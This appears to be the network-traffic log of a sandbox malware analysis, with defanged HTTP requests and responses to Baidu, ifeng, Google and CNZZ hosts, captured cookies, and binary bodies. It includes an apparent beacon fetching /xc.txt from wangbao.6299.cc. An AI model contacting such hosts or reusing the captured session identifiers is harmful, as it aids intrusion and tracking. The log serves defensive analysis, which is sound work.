Accept: */*

Accept-Language: en-US

Referer: hXXp://VVV.baidu.com/

x-flash-version: 11,6,602,168

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: s1.bdstatic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:22 GMT

Content-Type: application/x-shockwave-flash

Content-Length: 1168

Connection: keep-alive

ETag: "479-5133332f91dc0"

Last-Modified: Wed, 08 Apr 2015 09:31:43 GMT

Expires: Sat, 05 Apr 2025 09:51:53 GMT

Age: 706709

Cache-Control: max-age=315360000

Accept-Ranges: bytes

Vary: Accept-Encoding,User-Agent

Content-Encoding: gzip

Ohc-Content-Crc: 2642443121

Server: ld02-sys-jorcol01.ld02.baidu.com

CDN-AGE: 1
...........y...CWS.....x.}T.n.6.%%Y..;...i...M...e.)2,A.-..5X...0.....
([.,.....Yo...C...aW...... .{.]t...I6L......~.Hj....e....4. [email protected]..
.y.h..=..wX.A.K...i...:._...V.....MmsSe.5....U7\ .#.........%..m.O...S
W.xo...'.4..8.G\.j.j.......=L.......N..a.3....Q-...]mF..jS...L.MJM..K.
K{3}..).l....[&.....4?....r..U$>/..~...a..........3.s..`.]d......N.
wH...h.}?..S..?(}\)m...8...j..=E...Ac.Oq...o..}....../..C.=.....1...S_
`...-.".....p...".rZ...4...z.y........U..}...c?.)A!._..6.vx.8......u..
_c'...QHI/yL.>..2..ml.}^..!.k...#.e.........Q6...r..*..T].V.m../...
....x...c........$...l.....N.`......A.|.m...2.Ms.Y...<...'..#.`....
....8 .Q.;bP.%Y..{.".-.......I..............Cmw.B}w..._..q......h.$.y.
.....>!1q..L.M.q./...o.8..;.r.IXN?..OH.`. .b......=..(....".....C..
.~...2.... ..../_...U)..s.\.j.,....T.Y,.o.o........`RI.s....b....."...
d$!$%.. )..i...."9....W.\Fh..U..).!.. ..Rw....=..QNEB....t.........C..
 ..%E.PJ@v. ...B............8.?c....'c}|.ZJ%S..,.......J[..*..t.......
"el.8*.-@f#.9S[.f..a....|.Z.T....j......?...5.0..`<.....Hg......wb.
..9...).E...;....%..d.(*..Xo].. .>.^]y}:i..\.H....9..-O..p...w..~w&
...._9m.Q..dV...X'.....zkUo].[....~.......:.<.r.......T..>..n,y.
....<<< skipped >>>

GET /xc.txt HTTP/1.1

User-Agent: Mozilla/4.0 (compatible)

Host: wangbao.6299.cc


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:19 GMT

Content-Type: text/plain

Content-Length: 3

Connection: keep-alive

Last-Modified: Mon, 30 Mar 2015 10:37:27 GMT

Accept-Ranges: bytes

ETag: "ded23b84d56ad01:0"

X-Server: bmFubmluZzAxLWNkbjEz

X-Cache: pass

1:1HTTP/1.1 200 OK..Date: Thu, 16 Apr 2015 14:10:19 GMT..Content-Type:
 text/plain..Content-Length: 3..Connection: keep-alive..Last-Modified:
 Mon, 30 Mar 2015 10:37:27 GMT..Accept-Ranges: bytes..ETag: "ded23b84d
56ad01:0"..X-Server: bmFubmluZzAxLWNkbjEz..X-Cache: pass..1:1..

GET /commonpage/1210/comment.number.min.js HTTP/1.1

Accept: */*

Referer: hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Host: y0.ifengimg.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:34 GMT

Server: PWS/8.1.20.9

X-Px: ms h0-s1149.v0-mow ( h0-s1145.v0-mow), ht h0-s1145.v0-mow.cdngp.net

Cache-Control: max-age=31536000

Expires: Tue, 12 Jan 2016 00:28:46 GMT

Age: 8170908

Content-Length: 579

Content-Type: application/x-javascript

Content-Encoding: gzip

Vary: Accept-Encoding

Last-Modified: Tue, 10 Dec 2013 06:22:55 GMT

Connection: keep-alive
...........S]O.0.. ..U.ZiyM............2...8v...U!....T.......].......
.HSU.1.M....;rF.Y.h......E..r.(.t..~)..qB.......N...k..~..i.6.......Ij
...G.{.m.......|n..h. .qf..U..p(...P..Fg[R...75.|.Z........_..........
...b.\.n..t<.X....m.J....7. !kgtM....C<..0-............h.7J=....
a...L8..r..>..FJp.......A.....h7.H......|D..a3.G.f...L..e..5..}....
... z.....t.5.R....._Jxu=...........[.Of.&2......>.y>=f{]...X...
5.}.*.IO[...n.n"......V.._.M.<.X....6...=..h>..c....L.dB.N..(...
rN.....h..b....VP.q...vWCEX....h*.......c....C........G^z./.....x..M..
.wx.WH}. @.~k.'V..:)P.QM...|.....N......HTTP/1.1 200 OK..Date: Thu, 16
 Apr 2015 14:10:34 GMT..Server: PWS/8.1.20.9..X-Px: ms h0-s1149.v0-mow
 ( h0-s1145.v0-mow), ht h0-s1145.v0-mow.cdngp.net..Cache-Control: max-
age=31536000..Expires: Tue, 12 Jan 2016 00:28:46 GMT..Age: 8170908..Co
ntent-Length: 579..Content-Type: application/x-javascript..Content-Enc
oding: gzip..Vary: Accept-Encoding..Last-Modified: Tue, 10 Dec 2013 06
:22:55 GMT..Connection: keep-alive.............S]O.0.. ..U.ZiyM.......
.....2...8v...U!....T.......]........HSU.1.M....;rF.Y.h......E..r.(.t.
.~)..qB.......N...k..~..i.6.......Ij...G.{.m.......|n..h. .qf..U..p(..
.P..Fg[R...75.|.Z........_.............b.\.n..t<.X....m.J....7. !kg
tM....C<..0-............h.7J=....a...L8..r..>..FJp.......A.....h
7.H......|D..a3.G.f...L..e..5..}....... z.....t.5.R....._Jxu=.........
..[.Of.&2......>.y>=f{]...X...5.}.*.IO[...n.n"......V.._.M.<.
X....6...=..h>..c....L.dB.N..(...rN.....h..b....VP.q...vWCEX...<<< skipped >>>

GET /commonpage/0304/arrow.gif HTTP/1.1

Accept: */*

Referer: hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Host: y0.ifengimg.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:36 GMT

Server: PWS/8.1.20.9

X-Px: ms h0-s1149.v0-mow ( h0-s1005.v0-mow), ht h0-s1005.v0-mow.cdngp.net

Cache-Control: max-age=31536000

Expires: Mon, 12 Oct 2015 22:48:04 GMT

Age: 16039352

Content-Length: 1062

Content-Type: image/gif

Last-Modified: Tue, 04 Mar 2014 09:18:38 GMT

Connection: keep-alive
GIF89a..p.............................................................
......................................................................
.................................................................!....
.8.,[email protected].{....r.l:...tJ.Z.Xk`..z...xL.....z.n....|N...x/<
.....n.]._{.....u..[........_..0d.}.......w.\.....b.3.^.4z......(3.\.5
.\......'...6...........B....m. 7.......k. 2...p....[....z/.....q1..X.
#...s6,@.e.!.....1..0D..0.1. .=*.1.Io%O.L.r.K\-_.4.s.MK5o.T.s...?=....
t..9E.*e.t..3M.J..u...U.^..u*..O..]*v...f..M.s-..n... w&../..].w...~C.
.lq0a....K.......CN'y.7..,?%.Y.R..=.m.Z......N.w5..._..-.%...q........
~./%|8...q.N^.9sF.. B(.e...ncWI}.....t._x9yt...I.........#..........?.
4..w.{..g^.0...o...\....Z!.AR.C......d..a..z..A$.....eR.Q.<...#A"..
.~7.P..(....8c^....M-..".....L..8$.;:YN..%)c.XF...Vv.bm.>...yPY.iC.
...l....J....*t.....@../.......C....B.}.......... ....Vj...f....v.....
*...N.....s.........*....:j......^D.C...*....k.......R.0..." ...VKm.$.
...$8`.... n...`g.yB0C.....m.,....-P.....[ .0.. ...,...z ..!|@.../L..%
4,[email protected]..;HTTP/1.1 200 OK..Date: Thu, 16 Apr 2015 14:10:36 
GMT..Server: PWS/8.1.20.9..X-Px: ms h0-s1149.v0-mow ( h0-s1005.v0-mow)
, ht h0-s1005.v0-mow.cdngp.net..Cache-Control: max-age=31536000..Expir
es: Mon, 12 Oct 2015 22:48:04 GMT..Age: 16039352..Content-Length: 1062
..Content-Type: image/gif..Last-Modified: Tue, 04 Mar 2014 09:18:38 GM
T..Connection: keep-alive..GIF89a..p..................................
..................................................................<<< skipped >>>

GET /tag/js/gpt.js HTTP/1.1

Accept: */*

Referer: hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Host: VVV.googletagservices.com

Connection: Keep-Alive



r.k..R.b..=.;...')ds....z..U."..|.=.*........|...y..E........k...._.u.
...Z.g -Us.f^!)6....|...g...(.. @k8.A8v-.-Y.....Iq..~.n.....V.)..m....
.{.IN|8..s_....!W:....Y..h......r:W..5...4.4.<=...Y<....8.B....;
;....Qy..U.Kqf....x.|%.[.q.L.n...{U......t..SR,.,y{5>.:..( (66|....
... .......hj.o.0...v.:JR>..n..m.x....\....6..)........b.3pG....,..
..d2.y..77....Z....^...........u`.v.cg../.wE.a...?..0...*.e,.2Vl......
.v~.....c.y1..k.-g..lOr=.#.....dd9..e..}.&.A#[email protected]*A......9...^.
.Y.m..@.>...$1P.Apk......J.e.f2.\.#.........m...g...]I`.....y.d....
.......g.....6.....<..dX ZI.tG..9.....V..e..zf.s....y.....W.i...u@o
.0........l....c?@K...>..s../S.B..]..(N....L.Pa.|..R..._..e.....*.R
.. ^.......J../T..|y./O..6!.'_...<.(.../.Sk~.....|......oY...i.E.=B
..|.^;./..K.B.../.....0x.:..u.d..[.O!.>....~...#.|JO..>p...$.#.W
Pj..B.}..Q.8.....b....<.$...=.2.. A.9R...Z.....f..*..{.YW...C..;.J.
....j.`U}...{[email protected]....]oU]A..`..`....I...Y.Z......B...>...Z.
.?......{.3....[o....{..T....CY........r.........T....e....vS..6...e~.
..c.......P...F...U>......8..b`}..............P.k.[...L...=... .4..
,g.....'.D.0..................z.....hQ]kb..~/dg .....9t|..............
..|[email protected]..,.>[email protected];'...on8..pY...[."./.".......Q.BG.#...
.PW.....A.\_...Pyw}..p...U..D.....S.)..R..Zv.Wi.Sx.....h...^.......>
;......X.............{........lm......7.9..S.:.j..~....&..d#u..T..n\5.
zg....r=.......#6...'8.$.....n.={..mll=....k...d=......kAk:..3.p&>.
.8.q.B..n mf..&.,..> .*....}[email protected]..,..A.,..8..<<< skipped >>>

GET /tag/js/check_359604.js HTTP/1.1

Accept: */*

Referer: hXXp://fashion.ifeng.com/a/20150405/40098172_1.shtml

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; 360SE)

Host: VVV.googletagservices.com

Connection: Keep-Alive


HTTP/1.1 200 OK

P3P: policyref="hXXp://VVV.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"

Content-Type: text/javascript; charset=UTF-8

ETag: 10802316996441022840

Date: Thu, 16 Apr 2015 14:10:06 GMT

Expires: Thu, 16 Apr 2015 14:30:06 GMT

X-Content-Type-Options: nosniff

Content-Disposition: attachment; filename="f.txt"

Content-Encoding: gzip

Server: cafe

Content-Length: 1878

X-XSS-Protection: 1; mode=block

Age: 31

Cache-Control: public, max-age=1200

Alternate-Protocol: 80:quic,p=0.5
..........M.9.e..D}.B*.*$.......g.$8.....rd....@..'.i...k......;......
..\......O..../.S...c{.E..t....]/9: 8..sg.g..7).n.....).R..[.0W#.]....
.e..`Y........&....c.=...A...b",........%B.Z.........O......sZ0J..wT..
:Z}.q..Z...3.jJ....dA.~..T...d|...-g.....Cm.Z..b.RV....m..#.S.....{l.t
.4..Tj..t....M.r.].V..XR...u]... /[..3......lp?5.......i...?..4..g....
..............sP_......y..a3sP.E.)...........9t!........fi..5.....s%..
]&...........ul.b.......xO.7..d1........1.#P.Jw.r.j......l..7..H.g.V..
..t.K...........U..(..4jm..tx....Y8,..7.PA.9W.Q.m....@w.`.hZ....l|?d..
|..H.no%.7.%k.V.. ..%..'......<...Sw.8.tz..u..Hh..../.;.7...^e.....
./[email protected].%S.a.N...H..F(....kC!^...S&..k.Av..i...%']......
..37LZ...)._.vrr(.y4..........6.m...*....*.._...jhCJ...9..8..3.>Y._
...q...i2..._..UY..v....mj:.,...k....5eDa.s.....i.rz...........d...D.n
..j....E.UU..t..x..y.`...nl......K...f6...8..d......uSj...9$).I.]`.e..
.d.%Th..z.G.....u.c.8..<a....}...Uz..M:a Q..zd./.|L......f[........
.........PPvf];..,........K../Lq.6.1.($~s.....h...../(`...t)E .....q..
A.r..W.hJ~...hf..'.|Y...b.).5....^.yfM.g..h<.....2O.....Z"....N.E..
X.r..ty...1:[email protected]..........\..md....5...V.G.3.....s<m..
....t...d."_1F.9..%Xb}.Qml*R...;...(.ZnT...U..f.]~M<...v..........2
..Sr.....F...3.pNu..?a9r.6...{`..Y.s..}..y._....w$..: .CojG.8Ae.x..v. 
....27....z....zEOy..| .......`.e}...< Y.....T...Qo.BG.%..%<g..]
'N.......B...Y..q......e......H..@.....3..Y.......F...3..e.........hD5
.........;(Yeb.t[%."!.hj..k8.....(. ./..S.e.R...([email protected].@.<<< skipped >>>

GET /stat.htm?id=4690803&r=&lg=en-us&ntime=none&cnzz_eid=1728210536-1429193417-&showp=1916x902&t=&h=1&rnd=316818665 HTTP/1.1

Accept: */*

Referer: hXXp://1.rwdns.com/zztj/yeshe.html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: oz.cnzz.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Tengine/1.4.6

Date: Thu, 16 Apr 2015 14:10:20 GMT

Content-Type: image/gif

Content-Length: 43

Last-Modified: Mon, 09 Mar 2015 09:01:02 GMT

Connection: close

Accept-Ranges: bytes

GIF89a.............!.......,...........D..;..

GET /core.php?web_id=4690803&t=z HTTP/1.1

Accept: */*

Referer: hXXp://1.rwdns.com/zztj/yeshe.html

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: c.cnzz.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/javascript

Content-Length: 750

Connection: keep-alive

Date: Thu, 16 Apr 2015 14:10:20 GMT

Last-Modified: Thu, 16 Apr 2015 14:10:20 GMT

Expires: Thu, 16 Apr 2015 14:25:20 GMT

Via: cache18.l2de1[706,200-0,M], cache26.l2de1[707,0], cache10.de1[707,200-0,M], cache3.de1[709,0]

X-Cache: MISS TCP_REFRESH_MISS dirn:7:158982743

X-Swift-SaveTime: Thu, 16 Apr 2015 14:10:20 GMT

X-Swift-CacheTime: 900
!function(){var p,q,r,a=encodeURIComponent,b="4690803",c="",d="",e="on
line_v3.php",f="hzs9.cnzz.com",g="1",h="text",i="z",j="站长
;统计",k=window["_CNZZDbridge_" b].bobject,l="http:",m="0"
,n=l "//online.cnzz.com/online/" e,o=[];o.push("id=" b),o.push("h=" f)
,o.push("on=" a(d)),o.push("s=" a(c)),n ="?" o.join("&"),"0"===m&&k.ca
llRequest([l "//cnzz.mmstat.com/9.gif?abc=1"]),g&&(""!==d?k.createScri
ptIcon(n,"utf-8"):(q="z"==i?"hXXp://VVV.cnzz.com/stat/website.php?web_
id=" b:"hXXp://quanjing.cnzz.com","pic"===h?(r=l "//icon.cnzz.com/img/
" c ".gif",p="<a href='" q "' target=_blank title='" j "'><im
g border=0 hspace=0 vspace=0 src='" r "'></a>"):p="<a href
='" q "' target=_blank title='" j "'>" j "</a>",k.createIcon(
[p])))}();HTTP/1.1 200 OK..Server: Tengine..Content-Type: application/
javascript..Content-Length: 750..Connection: keep-alive..Date: Thu, 16
 Apr 2015 14:10:20 GMT..Last-Modified: Thu, 16 Apr 2015 14:10:20 GMT..
Expires: Thu, 16 Apr 2015 14:25:20 GMT..Via: cache18.l2de1[706,200-0,M
], cache26.l2de1[707,0], cache10.de1[707,200-0,M], cache3.de1[709,0]..
X-Cache: MISS TCP_REFRESH_MISS dirn:7:158982743..X-Swift-SaveTime: Thu
, 16 Apr 2015 14:10:20 GMT..X-Swift-CacheTime: 900..!function(){var p,
q,r,a=encodeURIComponent,b="4690803",c="",d="",e="online_v3.php",f="hz
s9.cnzz.com",g="1",h="text",i="z",j="站长统计"
,k=window["_CNZZDbridge_" b].bobject,l="http:",m="0",n=l "//online.cnz
z.com/online/" e,o=[];o.push("id=" b),o.push("h=" f),o.push("on=" <<< skipped >>>

GET /passApi/js/uni_login_wrapper.js?cdnversion=1429193460319&_=1429193460101 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&ch=&tn=baidu&bar=&wd=Ã„ÃÂ¾Â©Â»ÂªÃ‘Ã¯ÃŒÂ«Ã‘Ã´Ã„ÃœÃŽÂ¬ÃÃž&rn=&rsv_pq=d2904f7a0001a2af&rsv_t=42818soSHCj6OJ1V+D3jINfqWBpwgbzcx03vVt65ADB0W8InvHUTnZY4ek0&rsv_enter=1&inputT=29860

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: passport.baidu.com

Connection: Keep-Alive

Cookie: H_PS_PSSID=11077_1427_13074_12825_13381_12867_13322_12692_13411_10562_12723_12735_13438_13086_13453_13325_13201_12835_13491_13162_8498; BAIDUID=6483934B3F9915C4C4DEE385E7300A12:FG=1; BIDUPSID=6483934B3F9915C4C4DEE385E7300A12


HTTP/1.1 200 OK

Content-Type: text/javascript

ETag: "4219043308"

Accept-Ranges: bytes

Last-Modified: Wed, 08 Apr 2015 05:56:32 GMT

Expires: Thu, 16 Apr 2015 14:20:56 GMT

Cache-Control: max-age=600

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Length: 1420

Date: Thu, 16 Apr 2015 14:10:56 GMT

Server: apache
......$U...Wmo.F.. [email protected].\[..r...Nj..}.l....4......,64.T....<
..3.....R..i.........&.V#........ZD.&I".%<..,.1....6(b"x..h..M.....
.`..Sw.b..2..2.....(......4MR.?.k....9..-.x*`.F...2..._.iB.5...@f..!.~
..........;`..%.R..`...'....#....,g.....>.........v ./sC.$..s.,....
.L....B.%.2...#9I.i...=N."[email protected]...;=...XyF ^2K...........53@(...
.~.P...^.<..1O..O...f.u.C......,......S.^Y.>0.t..(.VynK.U('....z
.g...e..M...<..|...J..`0..4KDB......sx.{.u{j.n... ../G..g.H.&.,.B93
..~r.3,U..7E..(Y.x...?...).8.}..9......a#..p3..C..~@<B=g.F. ......'
.l.LO0...,|..Q{.P.....`......"f.`....E.\%q..8E5:.............g.b#J.?."
..R..)...1.....).?......)!t..r........#.....;...|.....TR.>...=u..|B
.1.h...O.....1s....^.LI.p.zfG...xJ<<c.>....K..2-d7{@.8......~
.(MW........F.C...|.G..O....Fps|..\.Bb..O...l<....;v..Q.H.H..tT#:.p
....0..F...i.Q.8..a6&......m{H.0.....Q.s.%-.n..$ ............c..'SG..{
.[..C.y.)...=.s..:.9%.3..5V.3...... ......Qj...\.7..F...........Yi..T.
 ..P......P...>..;......L.>..\...'.Y.S..;..F..A|.=.N....J.>.~
d..d.....zJxl.C?.....M.&...bY.....S..?Ra......V.B..l...\...Xw.2.pu..#.
?K~H%Q. ..[...1...N.UfR.f,.L..<[email protected].".>.I&.P.r9&2
.._.4..Smh1....n.Q...ss...yp...[.....E.F.Y..e.,.5._.u.E..sE-.$V.... ..
lk.>._.m@[email protected][email protected].=.M...X....E..2....I.,......
^w.....ub.(..#.;.\....T...G.T.S...DH....`p.DheHR..a.d[..FkUZ......d.cX
..w..P.....)/.%dY5.e.'[email protected]_....{...9.Z.....gZk.M.\6.D.<[email protected]
8.#......<<< skipped >>>

GET /w.gif?q=0‡20ˆ30†60„80†30„90ˆ50Š70ˆ00…00ˆ50‹00‡20‰50ˆ20…10ˆ40‰7&fm=se&T=1429193454&y=B776A7CF&rsv_cache=0&rsv_svoice=0&rsv_pre=0&rsv_reh=63_83_63_83_63_83_63_63_103_63|304_387&rsv_scr=1895_1242_110_0_902_1916&rsv_psid=6483934B3F9915C4C4DEE385E7300A12&rsv_sid=11077_1427_13074_12825_13381_12867_13322_12692_13411_10562_12723_12735_13438_13086_13453_13325_13201_12835_13491_13162_8498&cid=0&qid=8ec273590001dc81&t=1429193461944&rsv_iorr=1&rsv_tn=baidu&rsv_ssl=0&path=http://VVV.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&ch=&tn=baidu&bar=&wd=%C3%84%C3%8F%C2%BE%C2%A9%C2%BB%C2%AA%C3%91%C3%AF%C3%8C%C2%AB%C3%91%C3%B4%C3%84%C3%9C%C3%8E%C2%AC%C3%90%C3%9E&rn=&rsv_pq=d2904f7a0001a2af&rsv_t=42818soSHCj6OJ1V%2BD3jINfqWBpwgbzcx03vVt65ADB0W8InvHUTnZY4ek0&rsv_enter=1&inputT=29860 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&ch=&tn=baidu&bar=&wd=Ã„ÃÂ¾Â©Â»ÂªÃ‘Ã¯ÃŒÂ«Ã‘Ã´Ã„ÃœÃŽÂ¬ÃÃž&rn=&rsv_pq=d2904f7a0001a2af&rsv_t=42818soSHCj6OJ1V+D3jINfqWBpwgbzcx03vVt65ADB0W8InvHUTnZY4ek0&rsv_enter=1&inputT=29860

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:58 GMT

Server: Apache

Cache-Control: max-age=315360000

Expires: Sun, 13 Apr 2025 14:10:58 GMT

Last-Modified: Thu, 28 Sep 2006 03:51:19 GMT

ETag: "19dc1a8-0-451b46b7"

Accept-Ranges: bytes

Content-Length: 0

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Content-Type: image/gif

GET /img/baidu_jgylogo3.gif HTTP/1.1

Accept: */*

Referer: hXXp://VVV.baidu.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.baidu.com

Connection: Keep-Alive

Cookie: BAIDUID=8C833062B6F97482CA56473B4B36B66F:FG=1; BIDUPSID=8C833062B6F97482CA56473B4B36B66F; H_PS_PSSID=13495_11077_1468_13464_13074_13382_12867_13322_12691_13411_10562_12722_12737_13439_13085_13325_13202_12835_13491_13162_8498; BD_CK_SAM=1; BDSVRTM=0; BD_HOME=0


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:09 GMT

Server: Apache

Last-Modified: Wed, 22 Jun 2011 06:40:43 GMT

ETag: "2c1-4a6473f6030c0"

Accept-Ranges: bytes

Content-Length: 705

Cache-Control: max-age=315360000

Expires: Sun, 13 Apr 2025 14:10:09 GMT

Connection: Keep-Alive

Content-Type: image/gif
GIF89au.&.....2/...Y`.....vt)2.......!.......,....u.&....x...0. J.0...
.`.UV!L...l...P....V..|.....4...H..(............t{....,w.|..B.Z.a.K.7|
M.Ph..%....n8FN&:@F..|V1~w.y....r.. .9.khlO.j.!.s.\...m..&.\...AZ.PQ..
~...yX..R..............WE.z85.'...............D.a...........,...L.....
.&..P..<.T..H...g.t..gj..4.. ....O1..>*HF%[email protected]...\.N...$
..(.'&3g..9(.r...9..D.,i.q l.;)4. 0.06`Z.fW."U.M...Ni....jC...X..x..m.
.............eK............n..BC[... `........_.:&.`.S.........../m...
Y...... .a....~........0.....p.!..i..6..f....y\<..{.f.[t...O'.S..A.
.. .\L.......`.....m.T52.D]P..U.a.}..H.=..~.Ux.m..d....e..Z$..#.r0!~.*
..W ...v..#.U.a..mf=..*L...<0.3...]..x...\y..2....).J.h..iH.t.....H
K&......D.K.....;HTTP/1.1 200 OK..Date: Thu, 16 Apr 2015 14:10:09 GMT.
.Server: Apache..Last-Modified: Wed, 22 Jun 2011 06:40:43 GMT..ETag: "
2c1-4a6473f6030c0"..Accept-Ranges: bytes..Content-Length: 705..Cache-C
ontrol: max-age=315360000..Expires: Sun, 13 Apr 2025 14:10:09 GMT..Con
nection: Keep-Alive..Content-Type: image/gif..GIF89au.&.....2/...Y`...
..vt)2.......!.......,....u.&....x...0. J.0....`.UV!L...l...P....V..|.
....4...H..(............t{....,w.|..B.Z.a.K.7|M.Ph..%....n8FN&:@F..|V1
~w.y....r.. .9.khlO.j.!.s.\...m..&.\...AZ.PQ..~...yX..R..............W
E.z85.'...............D.a...........,...L......&..P..<.T..H...g.t..
gj..4.. ....O1..>*HF%[email protected]...\.N...$..(.'&3g..9(.r...9..D.,i
.q l.;)4. 0.06`Z.fW."U.M...Ni....jC...X..x..m..............eK.........
...n..BC[... `........_.:&.`.S.........../m...Y...... .a....~.....<<< skipped >>>

GET /s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&ch=&tn=baidu&bar=&wd=Ã„ÃÂ¾Â©Â»ÂªÃ‘Ã¯ÃŒÂ«Ã‘Ã´Ã„ÃœÃŽÂ¬ÃÃž&rn=&rsv_pq=d2904f7a0001a2af&rsv_t=42818soSHCj6OJ1V+D3jINfqWBpwgbzcx03vVt65ADB0W8InvHUTnZY4ek0&rsv_enter=1&inputT=29860 HTTP/1.1

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*

Referer: hXXp://VVV.baidu.com/

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.baidu.com

Connection: Keep-Alive

Cookie: H_PS_PSSID=13495_11077_1468_13464_13074_13382_12867_13322_12691_13411_10562_12722_12737_13439_13085_13325_13202_12835_13491_13162_8498; BD_CK_SAM=1; BD_HOME=0; WWW_ST=1429193458554


HTTP/1.1 200 OK

Date: Thu, 16 Apr 2015 14:10:53 GMT

Content-Type: text/html;charset=utf-8

Transfer-Encoding: chunked

Connection: Keep-Alive

Vary: Accept-Encoding

Set-Cookie: BAIDUID=6483934B3F9915C4C4DEE385E7300A12:FG=1; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com

Set-Cookie: BIDUPSID=6483934B3F9915C4C4DEE385E7300A12; expires=Thu, 31-Dec-37 23:55:55 GMT; max-age=2147483647; path=/; domain=.baidu.com

Set-Cookie: BD_CK_SAM=1;path=/

Set-Cookie: BDSVRTM=7; path=/

Set-Cookie: H_PS_PSSID=11077_1427_13074_12825_13381_12867_13322_12692_13411_10562_12723_12735_13438_13086_13453_13325_13201_12835_13491_13162_8498; path=/; domain=.baidu.com

P3P: CP=" OTI DSP COR IVA OUR IND COM "

Cache-Control: private

CKPACKNUM: 2

CKRNDSTR: 90001dc81

X-Powered-By: HPHP

Server: BWS/1.1

X-UA-Compatible: IE=Edge,chrome=1

BDPAGETYPE: 3

BDQID: 0x8ec273590001dc81

BDUSERID: 0

Content-Encoding: gzip
56e3..............{.cGv'..>..l.2.H&..L.X.Ru..v..Z.n..TM\.....K|dV)E
`...v....cg..1......m....^...W.l....9q"nD....Z.`...".F..8q.....7....O~
.....v>{p..r..'.?.......\~p_.N.h...<.F..]...v.e....O...-..h..fq.
0\...b. >y..G..4.....W .ZK.....n.._mO....4Zo.mo....u.....*z.)...^P\
..x.....M....W.........._.........._../.3....................._}....w.
........T5.......Q.........f.b...z..f._.WI_J........l...5... ........s
4....h4J.....U.Z.v..z.,:..j.I..r.Y.3..2...E.*.m...ju.jO]....vT..j..~=.
...h..^w.u......9/-g...4KJ.Yi.-.F.i.:}.....%.m.g.Y,..>Y.v.k.dy.\..T
..`....((.......&...2X.G..J...x.2..<...o# K).O.UG..~;RS.....j.q...4
N&.m.v.`.s.!c_.#`....Z.G.. .)...r....X.xM]...6...Z=......U.z5.......L.
P...W....*Nt.n=....p_.....jM..eU..Zi..Tzf..S..a.5.l....*'.h.wv..1m....
.V..6[.|X..........a4.....t2[...)@..`#m......_.*.......:^...8".......V
..>kW .d|..4..v.Lv.b....W.x}.6J...j4...(.. ..v...%..,z.I..^..r..{..
..hV.f.d.a.R.....7.#......Ug..F.Bvsy.x.."...l..Ld.-k....2.l...6...1p.#
